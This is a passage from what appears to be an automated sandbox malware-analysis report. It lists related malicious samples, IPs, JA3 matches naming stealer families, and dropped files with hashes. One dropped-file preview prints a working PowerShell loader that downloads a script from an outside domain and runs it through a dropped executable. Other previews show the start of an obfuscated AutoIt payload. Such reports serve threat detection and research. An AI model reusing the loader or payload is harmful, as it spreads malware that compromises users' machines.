                                                                                              KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              oJkvQZYkrx.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0euLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.49.155
                                                                                              Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                              • 147.45.49.155
                                                                                              37f463bf4616ecd445d4a1937da06e19uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              installer.msiGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\Public\Guard.exeR4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                  s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                    PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                      PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                        ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                          ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                            EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                                                              RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x47eed223, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1048576
                                                                                                                  Entropy (8bit):0.9433513948950576
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:DSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:DazaHvxXy2V2UR
                                                                                                                  MD5:7B8D153B8B5E9F93470E17FBB5D1A55F
                                                                                                                  SHA1:851FFDEB62EEF172E5EC9E6B0906EB1D95D8571A
                                                                                                                  SHA-256:ECE9E094CEC3BA838B9DDFE5948249278F3E291EA2252F88BFFD4948AB00DEC8
                                                                                                                  SHA-512:94E71FC4CD2C09297C3486A417F7185B18F2683CF017B36B6BFD2ECDB44BAE3A7CF742E7A90FBFE0C4F93B82688AAA3B98D1223BDE340FCFBD74F6567390BBB9
                                                                                                                  Malicious:false
                                                                                                                  Preview:G..#... ...............X\...;...{......................0.x...... ...{s.6....|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................^...6....|....................g[6....|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\Guard.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                                                  • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                                                  • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\PublicProfile.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\BnQwAP.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):491
                                                                                                                  Entropy (8bit):5.191609448349446
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:fZUoHFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:feoHCknZ9LzjYnRSb8Cba
                                                                                                                  MD5:AB05FCD936A94B5F59C5FA9A33508DC5
                                                                                                                  SHA1:5E93159500F769E453FC2CDC21EC7A80D013EAF0
                                                                                                                  SHA-256:5160D42832ED640E20C94FAF1127797448110EC6F848E4D383CC694EA74D429E
                                                                                                                  SHA-512:BBDE57DB63D4F857AD78C181237B29F13A661D2BC00F477BCAE5686467784940353B3E2F3EAF9CDD6E5ABF50CFA1EDE2D6756D67742B440BF4F673B268943DCB
                                                                                                                  Malicious:true
                                                                                                                  Preview:[string]$fU5L = "https://tiffany-careers.com/jzuVDmQ.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                                                                                  C:\Users\Public\Secure.au3

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1150519
                                                                                                                  Entropy (8bit):5.198639503905394
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:28V+jcfSplhi959S1mg+PL9KBZ9kt41MgsUWiOl08zHBhk/d:qcElo59TZAZ9ssWDphk1
                                                                                                                  MD5:DDD5ABB63224FAE3D89C5A90F0AA7874
                                                                                                                  SHA1:F2B56F63C4505F1BEFAC603DB51B18473B7A16A9
                                                                                                                  SHA-256:99A728108CF4148666B76881247BFD8DC1D666A0E3EC80C5CFA81610B995A194
                                                                                                                  SHA-512:DF443771AA472AC2CE6D674F190CE1A79D38ACE2BAF5B9AD620042F708C12729B70B742B12003B9C9EDFB442B62EB948F10D74543EB1AE6571896F51152FE0F9
                                                                                                                  Malicious:true
                                                                                                                  Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\92d1d36b-d665-4e11-87b6-ab963832b071.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):475
                                                                                                                  Entropy (8bit):4.963247713778661
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                                                  MD5:D46529E824E6E834D0D750C5560C136C
                                                                                                                  SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                                                  SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                                                  SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):475
                                                                                                                  Entropy (8bit):4.963247713778661
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqRYSsBdOg2HEcaq3QYiub6P7E4TX:Y2sRds9dMHX3QYhbS7n7
                                                                                                                  MD5:D46529E824E6E834D0D750C5560C136C
                                                                                                                  SHA1:E6597929E439E6AF24CE7249F0D303987F0760BF
                                                                                                                  SHA-256:818753A5C6D3C843FBA032CCB1B1681F6226C17B388A1E3052774B1DD8809C72
                                                                                                                  SHA-512:CE939B02393B7F46CE528527A40DCB56023CF6682B664D5685354CDA51388EE603FCAF018A428EFB08AD5800B68847F6F512B05F6D772E435507EE32BCEA0963
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341054937965898","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146333},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223060812Z-196.bmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65110
                                                                                                                  Entropy (8bit):4.0960479354974
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:u0eDil7wkRKfCqzmbeE/kh1B1Qn/0CjVQe0yZHvxUli:GA7wyCNSiE/kh1Bc/0Cj4yZJ7
                                                                                                                  MD5:AD103A90F30942B861F8499BF5C68CB9
                                                                                                                  SHA1:4C70481637E46F4E61CDBF46E8ACB05FB31AB263
                                                                                                                  SHA-256:F4DE33405E2771BA2C8FD2E0378453815CE0F3732CC624C5D163060616172389
                                                                                                                  SHA-512:0E14321DB45729D7D11D6DB505C75F50B71CE6036A91C3E18DD988CD1A43CA90DDC592F739C1170F1BA4521AE2702A1144912B77E805B9220F77EB196C05326B
                                                                                                                  Malicious:false
                                                                                                                  Preview:BMV.......6...(...k...h..... .............................................................................................................................................................................................................................................................................................................................................................qrs.ghi.................jkl.........us..LI..OM......po..LJ.._]..........*)-.0/3.}}..........98<.=<@.........................................................................................................................................................................................................................................................................................................................................dfg.`ab.`ab.~.......`ab.`ab._`a.....C@..CA..CA..pn..ca..CA..CA..MK........"..."...!.....326..."...".558...........................................................................................

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Certificate, Version=3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1391
                                                                                                                  Entropy (8bit):7.705940075877404
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                  Malicious:false
                                                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):71954
                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                  Malicious:false
                                                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):192
                                                                                                                  Entropy (8bit):2.7457468364538267
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:kkFkleNXfllXlE/HT8k3lJtNNX8RolJuRdxLlGB9lQRYwpDdt:kKHOT8aRNMa8RdWBwRd
                                                                                                                  MD5:42BD476D84108A1A2038EC07CC0B2A8E
                                                                                                                  SHA1:DFF2F911BA32E9998DE3293D0E425FAE35DF1CB8
                                                                                                                  SHA-256:5F5727E9A975AAD8D5A0BFC875172B3E60DEC6B2B2715DDF93BBD7D076A46D2D
                                                                                                                  SHA-512:63CE8813BE547A68FABC5C09B5B47CA0569DB72E84DCD20C3626798BCF7695F87E75EFD2095846C07E6F0D04C3ED3D3A6D2AB089BA20AEACA4D74895CE08EBB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... ........m....U..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):328
                                                                                                                  Entropy (8bit):3.117522441811026
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:kKEB9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1DnLNkPlE99SNxAhUe/3
                                                                                                                  MD5:16E1AAA267B262C49D70E2C089079B72
                                                                                                                  SHA1:4B7B17AD2FDBE9043BB90D721B06D181BB6E7443
                                                                                                                  SHA-256:0429EEAEB893DC0F02CD3A59B5CA07188820DF0118CB4E162F67C0FB52B14357
                                                                                                                  SHA-512:8B82CC3C1DEF51CD405BEC149462A5BC7DA768082A62F0F94DD1000851B276F9E3D63F4F601ADB3CC33F964D16FB4EF235D3A98FAF0D769904175022BFBF0345
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... .........l.".U..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7448

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
